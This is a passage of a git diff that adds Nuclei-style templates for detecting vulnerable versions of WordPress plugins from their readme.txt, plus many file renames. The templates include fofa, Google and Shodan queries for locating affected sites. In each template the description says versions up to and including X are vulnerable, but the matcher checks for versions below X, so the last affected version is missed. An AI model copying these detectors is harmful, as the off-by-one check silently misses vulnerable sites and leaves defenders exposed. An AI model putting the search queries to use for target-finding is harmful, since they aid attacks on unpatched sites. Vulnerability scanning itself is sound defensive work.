max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/white-label-cms/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "white-label-cms" + part: body + + - type: dsl + dsl: + - compare_versions(version, '< 2.7.3') \ No newline at end of file diff --git a/poc/cve/CVE-2024-4289.yaml b/poc/cve/CVE-2024-4289.yaml new file mode 100644 index 0000000000..2827d37f32 --- /dev/null +++ b/poc/cve/CVE-2024-4289.yaml @@ -0,0 +1,58 @@ +id: CVE-2024-4289 + +info: + name: > + Sailthru Triggermail <= 1.1 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The Sailthru Triggermail plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in all versions up to, and including, 1.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://www.wordfence.com/threat-intel/vulnerabilities/id/9b6be9c5-0142-458e-bf7e-2d4ae169e555?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-4289 + metadata: + fofa-query: "wp-content/plugins/sailthru-triggermail/" + google-query: inurl:"/wp-content/plugins/sailthru-triggermail/" + shodan-query: 'vuln:CVE-2024-4289' + tags: cve,wordpress,wp-plugin,sailthru-triggermail,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/sailthru-triggermail/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "sailthru-triggermail" + part: body + + - type: dsl + dsl: + - compare_versions(version, '< 1.1') \ No newline at end of file diff --git a/poc/cve/CVE-2024-4290.yaml b/poc/cve/CVE-2024-4290.yaml new file mode 100644 index 0000000000..820be8767a --- /dev/null +++ b/poc/cve/CVE-2024-4290.yaml @@ -0,0 +1,58 @@ +id: CVE-2024-4290 + +info: + name: > + Sailthru Triggermail <= 1.1 - Authenticated (Admin+) Stored Cross-Site Scripting + author: topscoder + severity: medium + description: > + The Sailthru Triggermail plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 1.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. + reference: + - https://www.wordfence.com/threat-intel/vulnerabilities/id/9c657ea2-ff7b-4ef2-a7dd-a330484dd821?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N + cvss-score: 4.4 + cve-id: CVE-2024-4290 + metadata: + fofa-query: "wp-content/plugins/sailthru-triggermail/" + google-query: inurl:"/wp-content/plugins/sailthru-triggermail/" + shodan-query: 'vuln:CVE-2024-4290' + tags: cve,wordpress,wp-plugin,sailthru-triggermail,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/sailthru-triggermail/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "sailthru-triggermail" + part: body + + - type: dsl + dsl: + - compare_versions(version, '< 1.1') \ No newline at end of file diff --git a/poc/cve/CVE-2024-4316.yaml b/poc/cve/CVE-2024-4316.yaml new file mode 100644 index 0000000000..5a8cfe16a2 --- /dev/null +++ b/poc/cve/CVE-2024-4316.yaml @@ -0,0 +1,58 @@ +id: CVE-2024-4316 + +info: + name: > + EmbedPress Embed PDF, Google Docs, Vimeo, Wistia, Embed YouTube Videos, Audios, Maps & Embed Any Documents in Gutenberg & Elementor <= 3.9.16 - Authenticated (Contributor+) Stored Cross-Site Scripting via id Parameter + author: topscoder + severity: medium + description: > + The EmbedPress – Embed PDF, Google Docs, Vimeo, Wistia, Embed YouTube Videos, Audios, Maps & Embed Any Documents in Gutenberg & Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘id’ parameter in all versions up to, and including, 3.9.16 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://www.wordfence.com/threat-intel/vulnerabilities/id/2af03168-9344-4db0-9b69-2ad1fdb6d472?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-4316 + metadata: + fofa-query: "wp-content/plugins/embedpress/" + google-query: inurl:"/wp-content/plugins/embedpress/" + shodan-query: 'vuln:CVE-2024-4316' + tags: cve,wordpress,wp-plugin,embedpress,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/embedpress/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "embedpress" + part: body + + - type: dsl + dsl: + - compare_versions(version, '< 3.9.16') \ No newline at end of file diff --git a/poc/cve/CVE-2024-4397.yaml b/poc/cve/CVE-2024-4397.yaml new file mode 100644 index 0000000000..f91a3612c2 --- /dev/null +++ b/poc/cve/CVE-2024-4397.yaml @@ -0,0 +1,58 @@ +id: CVE-2024-4397 + +info: + name: > + LearnPress – WordPress LMS Plugin <= 4.2.6.5 - Authenticated (Instructor+) Arbitrary File Upload + author: topscoder + severity: high + description: > + The LearnPress – WordPress LMS Plugin plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'save_post_materials' function in versions up to, and including, 4.2.6.5. This makes it possible for authenticated attackers, with Instructor-level permissions and above, to upload arbitrary files on the affected site's server which may make remote code execution possible. + reference: + - https://www.wordfence.com/threat-intel/vulnerabilities/id/ec20d5c4-4c41-4ec9-8d0a-ec8f03634f7d?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2024-4397 + metadata: + fofa-query: "wp-content/plugins/learnpress/" + google-query: inurl:"/wp-content/plugins/learnpress/" + shodan-query: 'vuln:CVE-2024-4397' + tags: cve,wordpress,wp-plugin,learnpress,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/learnpress/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "learnpress" + part: body + + - type: dsl + dsl: + - compare_versions(version, '< 4.2.6.5') \ No newline at end of file diff --git a/poc/cve/CVE-2024-4398.yaml b/poc/cve/CVE-2024-4398.yaml new file mode 100644 index 0000000000..158bbc1c35 --- /dev/null +++ b/poc/cve/CVE-2024-4398.yaml @@ -0,0 +1,58 @@ +id: CVE-2024-4398 + +info: + name: > + HTML5 Audio Player- Best WordPress Audio Player Plugin <= 2.2.19 - Authenticated (Contributor+) Stored Cross-Site Scripting via Multiple Widgets + author: topscoder + severity: medium + description: > + The HTML5 Audio Player- Best WordPress Audio Player Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's widgets in all versions up to, and including, 2.2.19 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://www.wordfence.com/threat-intel/vulnerabilities/id/ca646202-b9e2-4272-b0e2-d39cd748fb8e?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-4398 + metadata: + fofa-query: "wp-content/plugins/html5-audio-player/" + google-query: inurl:"/wp-content/plugins/html5-audio-player/" + shodan-query: 'vuln:CVE-2024-4398' + tags: cve,wordpress,wp-plugin,html5-audio-player,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/html5-audio-player/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "html5-audio-player" + part: body + + - type: dsl + dsl: + - compare_versions(version, '< 2.2.19') \ No newline at end of file diff --git a/poc/cve/CVE-2024-4434.yaml b/poc/cve/CVE-2024-4434.yaml new file mode 100644 index 0000000000..73377f4980 --- /dev/null +++ b/poc/cve/CVE-2024-4434.yaml @@ -0,0 +1,58 @@ +id: CVE-2024-4434 + +info: + name: > + LearnPress – WordPress LMS Plugin <= 4.2.6.5 - Unauthenticated Time-Based SQL Injection + author: topscoder + severity: critical + description: > + The LearnPress – WordPress LMS Plugin plugin for WordPress is vulnerable to time-based SQL Injection via the ‘term_id’ parameter in versions up to, and including, 4.2.6.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + reference: + - https://www.wordfence.com/threat-intel/vulnerabilities/id/2d64e1c6-1e25-4438-974d-b7da0979cc40?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-4434 + metadata: + fofa-query: "wp-content/plugins/learnpress/" + google-query: inurl:"/wp-content/plugins/learnpress/" + shodan-query: 'vuln:CVE-2024-4434' + tags: cve,wordpress,wp-plugin,learnpress,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/learnpress/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "learnpress" + part: body + + - type: dsl + dsl: + - compare_versions(version, '< 4.2.6.5') \ No newline at end of file diff --git a/poc/cve/CVE-2024-4444.yaml b/poc/cve/CVE-2024-4444.yaml new file mode 100644 index 0000000000..b81a9df850 --- /dev/null +++ b/poc/cve/CVE-2024-4444.yaml @@ -0,0 +1,58 @@ +id: CVE-2024-4444 + +info: + name: > + LearnPress – WordPress LMS Plugin <= 4.2.6.5 - Unauthenticated Bypass to User Registration + author: topscoder + severity: medium + description: > + The LearnPress – WordPress LMS Plugin plugin for WordPress is vulnerable to bypass to user registration in versions up to, and including, 4.2.6.5. This is due to missing checks in the 'create_account' function in the checkout. This makes it possible for unauthenticated attackers to register as the default role on the site, even if registration is disabled. + reference: + - https://www.wordfence.com/threat-intel/vulnerabilities/id/c9e1410f-10c9-4654-8b61-cfcdde696da7?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2024-4444 + metadata: + fofa-query: "wp-content/plugins/learnpress/" + google-query: inurl:"/wp-content/plugins/learnpress/" + shodan-query: 'vuln:CVE-2024-4444' + tags: cve,wordpress,wp-plugin,learnpress,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/learnpress/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "learnpress" + part: body + + - type: dsl + dsl: + - compare_versions(version, '< 4.2.6.5') \ No newline at end of file diff --git a/poc/cve/CVE-2024-4448.yaml b/poc/cve/CVE-2024-4448.yaml new file mode 100644 index 0000000000..336b4f65af --- /dev/null +++ b/poc/cve/CVE-2024-4448.yaml @@ -0,0 +1,58 @@ +id: CVE-2024-4448 + +info: + name: > + Essential Addons for Elementor – Best Elementor Templates, Widgets, Kits & WooCommerce Builders <= 5.9.19 - Authenticated (Contributor+) Stored Cross-Site Scripting via 'Dual Color Header', 'Event Calendar', & 'Advanced Data Table' + author: topscoder + severity: medium + description: > + The Essential Addons for Elementor – Best Elementor Templates, Widgets, Kits & WooCommerce Builders plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'Dual Color Header', 'Event Calendar', & 'Advanced Data Table' widgets in all versions up to, and including, 5.9.19 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://www.wordfence.com/threat-intel/vulnerabilities/id/21e12c72-7898-4896-9852-ebb10e5f9a3b?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N + cvss-score: 6.5 + cve-id: CVE-2024-4448 + metadata: + fofa-query: "wp-content/plugins/essential-addons-for-elementor-lite/" + google-query: inurl:"/wp-content/plugins/essential-addons-for-elementor-lite/" + shodan-query: 'vuln:CVE-2024-4448' + tags: cve,wordpress,wp-plugin,essential-addons-for-elementor-lite,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/essential-addons-for-elementor-lite/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "essential-addons-for-elementor-lite" + part: body + + - type: dsl + dsl: + - compare_versions(version, '< 5.9.19') \ No newline at end of file diff --git a/poc/cve/CVE-2024-4449.yaml b/poc/cve/CVE-2024-4449.yaml new file mode 100644 index 0000000000..1b14d2a57a --- /dev/null +++ b/poc/cve/CVE-2024-4449.yaml @@ -0,0 +1,58 @@ +id: CVE-2024-4449 + +info: + name: > + Essential Addons for Elementor <= 5.9.19 - Authenticated (Contributor+) DOM-Based Stored Cross-Site Scripting via Several Widgets + author: topscoder + severity: medium + description: > + The Essential Addons for Elementor – Best Elementor Templates, Widgets, Kits & WooCommerce Builders plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'Fancy Text', 'Filter Gallery', 'Sticky Video', 'Content Ticker', 'Woo Product Gallery', & 'Twitter Feed' widgets in all versions up to, and including, 5.9.19 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://www.wordfence.com/threat-intel/vulnerabilities/id/57ed6c7e-ca8d-476d-adce-905b2cd2eda8?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-4449 + metadata: + fofa-query: "wp-content/plugins/essential-addons-for-elementor-lite/" + google-query: inurl:"/wp-content/plugins/essential-addons-for-elementor-lite/" + shodan-query: 'vuln:CVE-2024-4449' + tags: cve,wordpress,wp-plugin,essential-addons-for-elementor-lite,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/essential-addons-for-elementor-lite/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "essential-addons-for-elementor-lite" + part: body + + - type: dsl + dsl: + - compare_versions(version, '< 5.9.19') \ No newline at end of file diff --git a/poc/cve/CVE-2024-4481.yaml b/poc/cve/CVE-2024-4481.yaml new file mode 100644 index 0000000000..c8d391f84d --- /dev/null +++ b/poc/cve/CVE-2024-4481.yaml @@ -0,0 +1,58 @@ +id: CVE-2024-4481 + +info: + name: > + Gutenberg Blocks with AI by Kadence WP <= 3.2.36 - Authenticated (Contributor+) Stored Cross-Site Scripting via Block Link + author: topscoder + severity: medium + description: > + The Gutenberg Blocks with AI by Kadence WP plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'link' attribute of the plugin's blocks in all versions up to, and including, 3.2.36 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://www.wordfence.com/threat-intel/vulnerabilities/id/ad0e4292-d890-499b-b70a-ed638d5b8ee9?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-4481 + metadata: + fofa-query: "wp-content/plugins/kadence-blocks/" + google-query: inurl:"/wp-content/plugins/kadence-blocks/" + shodan-query: 'vuln:CVE-2024-4481' + tags: cve,wordpress,wp-plugin,kadence-blocks,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/kadence-blocks/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "kadence-blocks" + part: body + + - type: dsl + dsl: + - compare_versions(version, '< 3.2.36') \ No newline at end of file diff --git a/poc/cve/CVE-2024-4490.yaml b/poc/cve/CVE-2024-4490.yaml new file mode 100644 index 0000000000..8e6c525a18 --- /dev/null +++ b/poc/cve/CVE-2024-4490.yaml @@ -0,0 +1,58 @@ +id: CVE-2024-4490 + +info: + name: > + Elegant Themes Divi Theme, Extra Theme, Divi Page Builder <= 4.25.0 - Authenticated (Contributor+) DOM-Based Stored Cross-Site Scripting + author: topscoder + severity: medium + description: > + The Elegant Themes Divi theme, Extra theme, and Divi Page Builder plugin for WordPress are vulnerable to DOM-Based Stored Cross-Site Scripting via the ‘title’ parameter in versions up to, and including, 4.25.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://www.wordfence.com/threat-intel/vulnerabilities/id/efac70f6-d959-41f7-bdef-d554f1c9133e?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-4490 + metadata: + fofa-query: "wp-content/plugins/divi-builder/" + google-query: inurl:"/wp-content/plugins/divi-builder/" + shodan-query: 'vuln:CVE-2024-4490' + tags: cve,wordpress,wp-plugin,divi-builder,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/divi-builder/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "divi-builder" + part: body + + - type: dsl + dsl: + - compare_versions(version, '< 4.25.0') \ No newline at end of file diff --git a/poc/cve/apache-solr-log4j-cve-2021-44228.yaml b/poc/cve/apache-solr-log4j-CVE-2021-44228.yaml similarity index 100% rename from poc/cve/apache-solr-log4j-cve-2021-44228.yaml rename to poc/cve/apache-solr-log4j-CVE-2021-44228.yaml diff --git a/poc/cve/CNVD-2020-68596.yaml b/poc/cve/cnvd-2020-68596-1075.yaml similarity index 100% rename from poc/cve/CNVD-2020-68596.yaml rename to poc/cve/cnvd-2020-68596-1075.yaml diff --git a/poc/cve/CNVD-2021-15824.yaml b/poc/cve/cnvd-2021-15824-1096.yaml similarity index 100% rename from poc/cve/CNVD-2021-15824.yaml rename to poc/cve/cnvd-2021-15824-1096.yaml diff --git a/poc/cve/CVE-2009-1151.yaml b/poc/cve/cve-2009-1151.yaml similarity index 100% rename from poc/cve/CVE-2009-1151.yaml rename to poc/cve/cve-2009-1151.yaml diff --git a/poc/cve/CVE-2015-3224.yaml b/poc/cve/cve-2015-3224.yaml similarity index 100% rename from poc/cve/CVE-2015-3224.yaml rename to poc/cve/cve-2015-3224.yaml diff --git a/poc/cve/CVE-2017-1000027.yaml b/poc/cve/cve-2017-1000027.yaml similarity index 100% rename from poc/cve/CVE-2017-1000027.yaml rename to poc/cve/cve-2017-1000027.yaml diff --git a/poc/cve/CVE-2018-11510.yaml b/poc/cve/cve-2018-11510.yaml similarity index 100% rename from poc/cve/CVE-2018-11510.yaml rename to poc/cve/cve-2018-11510.yaml diff --git a/poc/cve/CVE-2018-19136.yaml b/poc/cve/cve-2018-19136.yaml similarity index 100% rename from poc/cve/CVE-2018-19136.yaml rename to poc/cve/cve-2018-19136.yaml diff --git a/poc/cve/CVE-2018-19751.yaml b/poc/cve/cve-2018-19751.yaml similarity index 100% rename from poc/cve/CVE-2018-19751.yaml rename to poc/cve/cve-2018-19751.yaml diff --git a/poc/cve/CVE-2018-19877.yaml b/poc/cve/cve-2018-19877(1).yaml similarity index 100% rename from poc/cve/CVE-2018-19877.yaml rename to poc/cve/cve-2018-19877(1).yaml diff --git a/poc/cve/cve-2018-20009.yaml b/poc/cve/cve-2018-20009(1).yaml similarity index 100% rename from poc/cve/cve-2018-20009.yaml rename to poc/cve/cve-2018-20009(1).yaml diff --git a/poc/cve/CVE-2018-20010.yaml b/poc/cve/cve-2018-20010(1).yaml similarity index 100% rename from poc/cve/CVE-2018-20010.yaml rename to poc/cve/cve-2018-20010(1).yaml diff --git a/poc/cve/cve-2018-5715(1).yaml b/poc/cve/cve-2018-5715.yaml similarity index 100% rename from poc/cve/cve-2018-5715(1).yaml rename to poc/cve/cve-2018-5715.yaml diff --git a/poc/cve/CVE-2019-10232.yaml b/poc/cve/cve-2019-10232-3705.yaml similarity index 100% rename from poc/cve/CVE-2019-10232.yaml rename to poc/cve/cve-2019-10232-3705.yaml diff --git a/poc/cve/cve-2019-12581(1).yaml b/poc/cve/cve-2019-12581.yaml similarity index 100% rename from poc/cve/cve-2019-12581(1).yaml rename to poc/cve/cve-2019-12581.yaml diff --git a/poc/cve/cve-2019-12962.yaml b/poc/cve/cve-2019-12962(1).yaml similarity index 100% rename from poc/cve/cve-2019-12962.yaml rename to poc/cve/cve-2019-12962(1).yaml diff --git a/poc/cve/CVE-2019-13101.yaml b/poc/cve/cve-2019-13101-3806.yaml similarity index 100% rename from poc/cve/CVE-2019-13101.yaml rename to poc/cve/cve-2019-13101-3806.yaml diff --git a/poc/cve/CVE-2019-17270.yaml b/poc/cve/cve-2019-17270-3973.yaml similarity index 100% rename from poc/cve/CVE-2019-17270.yaml rename to poc/cve/cve-2019-17270-3973.yaml diff --git a/poc/cve/cve-2019-18371(1).yaml b/poc/cve/cve-2019-18371.yaml similarity index 100% rename from poc/cve/cve-2019-18371(1).yaml rename to poc/cve/cve-2019-18371.yaml diff --git a/poc/cve/cve-2019-2616(1).yaml b/poc/cve/cve-2019-2616.yaml similarity index 100% rename from poc/cve/cve-2019-2616(1).yaml rename to poc/cve/cve-2019-2616.yaml diff --git a/poc/cve/cve-2019-6340(1).yaml b/poc/cve/cve-2019-6340.yaml similarity index 100% rename from poc/cve/cve-2019-6340(1).yaml rename to poc/cve/cve-2019-6340.yaml diff --git a/poc/cve/cve-2019-8442.yaml b/poc/cve/cve-2019-8442(1).yaml similarity index 100% rename from poc/cve/cve-2019-8442.yaml rename to poc/cve/cve-2019-8442(1).yaml diff --git a/poc/cve/CVE-2019-9915.yaml b/poc/cve/cve-2019-9915.yaml similarity index 100% rename from poc/cve/CVE-2019-9915.yaml rename to poc/cve/cve-2019-9915.yaml diff --git a/poc/cve/cve-2020-10124.yaml b/poc/cve/cve-2020-10124(1).yaml similarity index 100% rename from poc/cve/cve-2020-10124.yaml rename to poc/cve/cve-2020-10124(1).yaml diff --git a/poc/cve/CVE-2020-10770.yaml b/poc/cve/cve-2020-10770-4380.yaml similarity index 100% rename from poc/cve/CVE-2020-10770.yaml rename to poc/cve/cve-2020-10770-4380.yaml diff --git a/poc/cve/cve-2020-11738(1).yaml b/poc/cve/cve-2020-11738.yaml similarity index 100% rename from poc/cve/cve-2020-11738(1).yaml rename to poc/cve/cve-2020-11738.yaml diff --git a/poc/cve/CVE-2020-13121.yaml b/poc/cve/cve-2020-13121.yaml similarity index 100% rename from poc/cve/CVE-2020-13121.yaml rename to poc/cve/cve-2020-13121.yaml diff --git a/poc/cve/cve-2020-14408.yaml b/poc/cve/cve-2020-14408(1).yaml similarity index 100% rename from poc/cve/cve-2020-14408.yaml rename to poc/cve/cve-2020-14408(1).yaml diff --git a/poc/cve/CVE-2020-14882-2-2.yaml b/poc/cve/cve-2020-14882-2.yaml similarity index 100% rename from poc/cve/CVE-2020-14882-2-2.yaml rename to poc/cve/cve-2020-14882-2.yaml diff --git a/poc/cve/CVE-2020-15568.yaml b/poc/cve/cve-2020-15568-4623.yaml similarity index 100% rename from poc/cve/CVE-2020-15568.yaml rename to poc/cve/cve-2020-15568-4623.yaml diff --git a/poc/cve/CVE-2020-17496.yaml b/poc/cve/cve-2020-17496-4673.yaml similarity index 100% rename from poc/cve/CVE-2020-17496.yaml rename to poc/cve/cve-2020-17496-4673.yaml diff --git a/poc/cve/CVE-2020-19283.yaml b/poc/cve/cve-2020-19283-4707.yaml similarity index 100% rename from poc/cve/CVE-2020-19283.yaml rename to poc/cve/cve-2020-19283-4707.yaml diff --git a/poc/cve/CVE-2020-19360.yaml b/poc/cve/cve-2020-19360-4713.yaml similarity index 100% rename from poc/cve/CVE-2020-19360.yaml rename to poc/cve/cve-2020-19360-4713.yaml diff --git a/poc/cve/CVE-2020-1956.yaml b/poc/cve/cve-2020-1956.yaml similarity index 100% rename from poc/cve/CVE-2020-1956.yaml rename to poc/cve/cve-2020-1956.yaml diff --git a/poc/cve/cve-2020-22209.yaml b/poc/cve/cve-2020-22209(1).yaml similarity index 100% rename from poc/cve/cve-2020-22209.yaml rename to poc/cve/cve-2020-22209(1).yaml diff --git a/poc/cve/cve-2020-22210.yaml b/poc/cve/cve-2020-22210(1).yaml similarity index 100% rename from poc/cve/cve-2020-22210.yaml rename to poc/cve/cve-2020-22210(1).yaml diff --git a/poc/cve/CVE-2020-24391.yaml b/poc/cve/cve-2020-24391-4813.yaml similarity index 100% rename from poc/cve/CVE-2020-24391.yaml rename to poc/cve/cve-2020-24391-4813.yaml diff --git a/poc/cve/CVE-2020-28351.yaml b/poc/cve/cve-2020-28351-4984.yaml similarity index 100% rename from poc/cve/CVE-2020-28351.yaml rename to poc/cve/cve-2020-28351-4984.yaml diff --git a/poc/cve/cve-2020-29597.yaml b/poc/cve/cve-2020-29597(1).yaml similarity index 100% rename from poc/cve/cve-2020-29597.yaml rename to poc/cve/cve-2020-29597(1).yaml diff --git a/poc/cve/CVE-2020-35580.yaml b/poc/cve/cve-2020-35580-5051.yaml similarity index 100% rename from poc/cve/CVE-2020-35580.yaml rename to poc/cve/cve-2020-35580-5051.yaml diff --git a/poc/cve/CVE-2020-35713.yaml b/poc/cve/cve-2020-35713-5058.yaml similarity index 100% rename from poc/cve/CVE-2020-35713.yaml rename to poc/cve/cve-2020-35713-5058.yaml diff --git a/poc/cve/CVE-2020-35774.yaml b/poc/cve/cve-2020-35774-5081.yaml similarity index 100% rename from poc/cve/CVE-2020-35774.yaml rename to poc/cve/cve-2020-35774-5081.yaml diff --git a/poc/cve/cve-2020-36287(1).yaml b/poc/cve/cve-2020-36287.yaml similarity index 100% rename from poc/cve/cve-2020-36287(1).yaml rename to poc/cve/cve-2020-36287.yaml diff --git a/poc/cve/CVE-2020-7318.yaml b/poc/cve/cve-2020-7318-5248.yaml similarity index 100% rename from poc/cve/CVE-2020-7318.yaml rename to poc/cve/cve-2020-7318-5248.yaml diff --git a/poc/cve/CVE-2020-8191.yaml b/poc/cve/cve-2020-8191-5294.yaml similarity index 100% rename from poc/cve/CVE-2020-8191.yaml rename to poc/cve/cve-2020-8191-5294.yaml diff --git a/poc/cve/CVE-2020-8497.yaml b/poc/cve/cve-2020-8497-5316.yaml similarity index 100% rename from poc/cve/CVE-2020-8497.yaml rename to poc/cve/cve-2020-8497-5316.yaml diff --git a/poc/cve/cve-2020-8644.yaml b/poc/cve/cve-2020-8644.yaml new file mode 100644 index 0000000000..ddeb6aaefd --- /dev/null 